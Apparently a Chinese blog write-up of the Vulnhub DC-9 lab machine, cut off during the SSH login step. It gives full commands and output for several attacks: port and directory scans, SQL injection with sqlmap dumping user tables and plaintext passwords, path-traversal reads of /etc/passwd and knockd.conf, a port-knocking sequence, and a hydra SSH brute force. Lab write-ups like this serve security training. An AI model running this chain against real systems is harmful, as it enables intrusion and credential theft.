{"id":438,"date":"2024-03-21T21:17:41","date_gmt":"2024-03-21T13:17:41","guid":{"rendered":"http:\/\/162.14.82.114\/?p=438"},"modified":"2024-03-21T21:17:41","modified_gmt":"2024-03-21T13:17:41","slug":"vulnhub-dc-9","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/438\/03\/21\/2024\/","title":{"rendered":"Vulnhub&#8211;DC-9"},"content":{"rendered":"<h1>DC-9<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116467.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116467.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321163232789\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116469.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116469.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321163316009\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u6253\u5f00\u626b\u4e00\u4e0b\uff1a<\/p>\n<p><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116470.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116470.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321165732705\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0cnmap\u626b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116471.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116471.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321165827440\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116472.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116472.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321165818801\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u662f\u6ca1\u95ee\u9898\u4e86\uff0c\u53ef\u4ee5\u5f00\u59cb\u653b\u51fb\u4e86\uff01<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sT -T4 -sV 10.160.58.244<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n80\/tcp open  http    Apache httpd 2.4.38 ((Debian))<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.160.58.244 -f -t 50 -x php,txt,html,jpg,png<\/code><\/pre>\n<pre><code class=\"language-txt\">\/.php\/                (Status: 403) [Size: 278]\n\/search.php\/          (Status: 200) [Size: 1091]\n\/icons\/               (Status: 403) [Size: 278]\n\/welcome.php\/         (Status: 302) [Size: 0] [--&gt; manage.php]\n\/results.php\/         (Status: 200) [Size: 1056]\n\/display.php\/         (Status: 200) [Size: 2961]\n\/css\/                 (Status: 200) [Size: 932]\n\/index.php\/           (Status: 200) [Size: 917]\n\/includes\/            (Status: 200) [Size: 746]\n\/.html\/               (Status: 403) [Size: 278]\n\/logout.php\/          (Status: 302) [Size: 0] [--&gt; manage.php]\n\/config.php\/          (Status: 200) [Size: 0]\n\/manage.php\/          (Status: 200) [Size: 1210]\n\/session.php\/         (Status: 302) [Size: 0] [--&gt; manage.php]\n\/.php\/  
              (Status: 403) [Size: 278]\n\/.html\/               (Status: 403) [Size: 278]\n\/server-status\/       (Status: 403) [Size: 278]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u654f\u611f\u76ee\u5f55\u63a2\u67e5<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116473.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116473.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172644171\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116474.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116474.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172957301\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116475.png'><img class=\"lazyload 
lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116475.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321173026118\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116476.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116476.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321173107773\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u7528\u6237\u540d<code>admin<\/code>\uff0c\u5237\u65b0\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116477.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116477.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321174512957\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5sql\u6ce8\u5165<\/h3>\n<pre><code class=\"language-bash\">1&#039; or &#039;1&#039; = &#039;1<\/code><\/pre>\n<p>\u6709\u56de\u663e\uff0c<\/p>\n<pre><code class=\"language-sql\">1&#039; or &#039;1&#039; = &#039;2<\/code><\/pre>\n<p>\u65e0\u56de\u663e\uff0c\u8bf4\u660esql\u6ce8\u5165\u6f0f\u6d1e\u5b58\u5728\uff0c\u5c1d\u8bd5\u8054\u5408\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-sql\">-1&#039; union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() #<\/code><\/pre>\n<p>\u672a\u679c\uff0c\u7ee7\u7eed\u8bd5\u63a2\uff0c\u6ca1\u6210\u529f\uff0c<code>sqlmap<\/code>\u68ad\u4e00\u4e0b\uff0c\u770b\u770b\u662f\u548b\u6ce8\u5165\u7684\u3002 <\/p>\n<pre><code class=\"language-text\">POST \/results.php HTTP\/1.1\nHost: 10.160.58.244\nContent-Length: 10\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.160.58.244\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.160.58.244\/search.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nsearch=ctf<\/code><\/pre>\n<p>\u4fdd\u5b58\u4e3a <code>1.txt<\/code>\uff0c\u767b\u5f55\u90a3\u4e2a\u754c\u9762\u4fdd\u5b58\u4e3a <code>2.txt<\/code>\uff0c\u5206\u522b\u6d4b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">POST \/manage.php HTTP\/1.1\nHost: 10.160.58.244\nContent-Length: 32\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: 
http:\/\/10.160.58.244\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.160.58.244\/manage.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=dg3l2p0bbh8od1harqv0an2ter\nConnection: close\n\nusername=admin&amp;password=password<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt<\/code><\/pre>\n<p>\u67e5\u5230\u4fe9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116478.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116478.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321184949089\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">sqlmap -r 2.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116480.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116480.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321185058115\" \/><\/div><\/p>\n<p>\u597d\u5bb6\u4f19\u767b\u5f55\u5012\u662f\u6ca1\u6709\u8dd1\u5230\u6f0f\u6d1e\u3002<\/p>\n<p>\u5c1d\u8bd5\u767b\u5f55\u8fdb\u53bb\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --current-db<\/code><\/pre>\n<pre><code class=\"language-sql\">[07:00:43] [INFO] fetching current database\ncurrent database: &#039;Staff&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --tables -D &quot;Staff&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: Staff\n[2 tables]\n+--------------+\n| StaffDetails |\n| Users        |\n+--------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --columns -T &quot;Users&quot; -D &quot;Staff&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: Staff\nTable: Users\n[3 columns]\n+----------+-----------------+\n| Column   | Type            |\n+----------+-----------------+\n| Password | varchar(255)    |\n| UserID   | int(6) unsigned |\n| Username | varchar(255)    |\n+----------+-----------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --dump -C &quot;Password,UserID,Username&quot; -T &quot;Users&quot; -D &quot;Staff&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: Staff\nTable: Users\n[1 entry]\n+--------+----------+----------------------------------+\n| UserID | Username | Password                         |\n+--------+----------+----------------------------------+\n| 1      | admin    | 856f5de590ef37314e7c3bdf6f8a66dc |\n+--------+----------+----------------------------------+<\/code><\/pre>\n<p>\u5f97\u5230\u7528\u6237\u4e0e\u5bc6\u7801\uff1a<\/p>\n<pre><code 
class=\"language-apl\">admin \n856f5de590ef37314e7c3bdf6f8a66dc(transorbital1)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116481.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116481.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321191011749\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u80fd\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u627e\u4e00\u4e0b\u4e0a\u4f20\u70b9\uff1a<\/p>\n<pre><code class=\"language-url\">http:\/\/10.160.58.244\/addrecord.php?file=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116482.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116482.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321191306276\" style=\"zoom: 33%;\" 
\/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --dbs<\/code><\/pre>\n<pre><code class=\"language-sql\">available databases [3]:\n[*] information_schema\n[*] Staff\n[*] users<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --tables -D &quot;users&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: users\n[1 table]\n+-------------+\n| UserDetails |\n+-------------+<\/code><\/pre>\n<pre><code>sqlmap -r 1.txt --columns -T &quot;UserDetails&quot; -D &quot;users&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: users\nTable: UserDetails\n[6 columns]\n+-----------+-----------------+\n| Column    | Type            |\n+-----------+-----------------+\n| firstname | varchar(30)     |\n| id        | int(6) unsigned |\n| lastname  | varchar(30)     |\n| password  | varchar(20)     |\n| reg_date  | timestamp       |\n| username  | varchar(30)     |\n+-----------+-----------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --dump -C &quot;username,password&quot; -T &quot;UserDetails&quot; -D &quot;users&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: users\nTable: UserDetails\n[17 entries]\n+-----------+---------------+\n| username  | password      |\n+-----------+---------------+\n| marym     | 3kfs86sfd     |\n| julied    | 468sfdfsd2    |\n| fredf     | 4sfd87sfd1    |\n| barneyr   | RocksOff      |\n| tomc      | TC&amp;TheBoyz    |\n| jerrym    | B8m#48sd      |\n| wilmaf    | Pebbles       |\n| bettyr    | BamBam01      |\n| chandlerb | UrAG0D!       
|\n| joeyt     | Passw0rd      |\n| rachelg   | yN72#dsd      |\n| rossg     | ILoveRachel   |\n| monicag   | 3248dsds7s    |\n| phoebeb   | smellycats    |\n| scoots    | YR3BVxxxw87   |\n| janitor   | Ilovepeepee   |\n| janitor2  | Hawaii-Five-0 |\n+-----------+---------------+<\/code><\/pre>\n<h3>ssh\u7206\u7834<\/h3>\n<p>\u5c06\u5176\u653e\u5165\u4e24\u4e2a\u6587\u4ef6\u5185\uff1a<\/p>\n<pre><code class=\"language-apl\">marym\njulied\nfredf\nbarneyr\ntomc\njerrym\nwilmaf\nbettyr\nchandlerb\njoeyt\nrachelg\nrossg\nmonicag\nphoebeb\nscoots\njanitor\njanitor2\n\n3kfs86sfd\n468sfdfsd2\n4sfd87sfd1\nRocksOff\nTC&amp;TheBoyz\nB8m#48sd\nPebbles\nBamBam01\nUrAG0D!\nPassw0rd\nyN72#dsd\nILoveRachel\n3248dsds7s\nsmellycats\nYR3BVxxxw87\nIlovepeepee\nHawaii-Five-0<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u5f00\u653e 22 \u7aef\u53e3\uff0c\u8fdc\u7a0b\u76ee\u5f55\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u5f97knock\u4e00\u4e0b\u624d\u4f1a\u5f00\u653e\uff1a<\/p>\n<pre><code class=\"language-text\">http:\/\/10.160.58.244\/manage.php?file=..\/..\/..\/..\/..\/..\/etc\/knockd.conf<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116483.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116483.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321202517833\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6309\u7167\u987a\u5e8f\u6572\u51fb\u5c31\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">nc 10.160.58.244 7469\nnc 
10.160.58.244 8475\nnc 10.160.58.244 9842<\/code><\/pre>\n<p>\u518d\u626b\u63cf\u4e00\u4e0b\u662f\u5426\u5f00\u653e\u4e86 ssh \u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">nmap 10.160.58.244<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE\n22\/tcp open  ssh\n80\/tcp open  http<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">hydra -L dcusername.txt -P dcpassword.txt ssh:\/\/10.160.58.244<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116484.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116484.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321204536465\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">chandlerb           UrAG0D!\njoeyt               Passw0rd\njanitor             Ilovepeepee<\/code><\/pre>\n<h3>ssh\u767b\u5f55<\/h3>\n<p>\u8fdb\u884c\u767b\u5f55\u67e5\u8be2\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116485.png'><img class=\"lazyload lazyload-style-2\" 